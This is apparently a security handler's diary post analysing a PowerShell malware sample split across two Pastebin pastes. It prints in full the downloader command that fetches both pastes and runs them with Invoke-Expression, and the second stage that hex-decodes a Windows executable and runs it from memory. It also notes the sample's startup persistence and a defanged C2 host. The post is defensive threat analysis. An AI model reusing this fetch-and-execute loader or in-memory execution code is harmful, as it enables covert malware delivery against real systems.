Divided Payload in Multiple Pasties
In politic, there is a strategy which says “divide and conquer”. It’s also true for some pieces of malware that spread their malicious code amongst multiple sources. One of our readers shared a sample of Powershell code found on Pastebin that applies exactly this technique. Thanks to him!
Here is the complete Powershell command line (beautified for easy read)
powershell.exe -command $request = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/mVjViriF’); $request.Method="Get”; $response = $request.GetResponse(); $requestStream = $response.GetResponseStream(); $readStream = New-Object System.IO.StreamReader $requestStream; $data=$readStream.ReadToEnd(); $rrequest = [System.Net.WebRequest]::Create('hxxps://pastebin[.]com/raw/g3KQyPSA’); $rrequest.Method="Get”; $rresponse = $rrequest.GetResponse(); $rrequestStream = $rresponse.GetResponseStream(); $rreadStream = New-Object System.IO.StreamReader $rrequestStream; $ddata=$rreadStream.ReadToEnd(); iex($data+$ddata)
The code is pretty easy to understand: It grabs the content of 2 pasties from pastebin.com, concatenates them and executes them through iex(), an alias for Invoke-Expression(). So, we can expect these pasties to contain more Powershell code.
Indeed, here is the content of the concatenated data:
function HexToBin([string]$s) { $return = @() for ($i = 0; $i -lt $s.Length ; $i += 2) { $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber) } Write-Output $return } $Str = ‘4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000 000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E2044 4F53206D6F64652E0D0D0A2400000000000000504500004C0103004050B35B0000000000000000E00002010B010800007E0100000A0000000 00000CE9C010000200000000000000000400000200000000200000400000000000000040000000000000000E0010000020000000000000200 40850000100000100000000010000010000000000000100000000000000000000000789C01005300000000A00100000800000000000000000 000000000000000000000C001000C000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000D47C01000020000 [stuff deleted] 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009001000C000000D 03C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'; $Str = $Str.replace("0","0"); [byte[]]$Data = HexToBin($str); $asm = [System.Reflection.Assembly]::Load($Data); $asm.EntryPoint.invoke($null,$null); write-host "Can you help me"; [void][System.Console]::ReadKey($true);
This piece of code decodes the hex-encoded $str variable into $data using the HexToBin() function and executes it. You can see the beginning of the string ‘0x4D 0x5A 0x90’ which indicates that it’s a PE file. The way it is executed is interesting. It uses the System.Reflection.Assembly[1] class to load the code and execute it from memory (file less Powershell)
The PE sample has the following SHA256 hash: 30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6.exe. It was unknown on VT yesterday but today it was uploaded from Denmark and reached already a score of 24/63[2]. It adds persistence by creating a .lnk file into %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ pointing to a copy of itself stored in %TEMP%. It tries to communicate with a C2 (testhoward[.]mysecondarydns[.]com) via HTTPS.
Happy Thanksgiving!
[1] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly?view=netframework-4.7.2
[2] https://www.virustotal.com/#/file/30db9979df050b966c8d89e0f76377b618145133b54662f8fa65dbce02f8c4b6/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments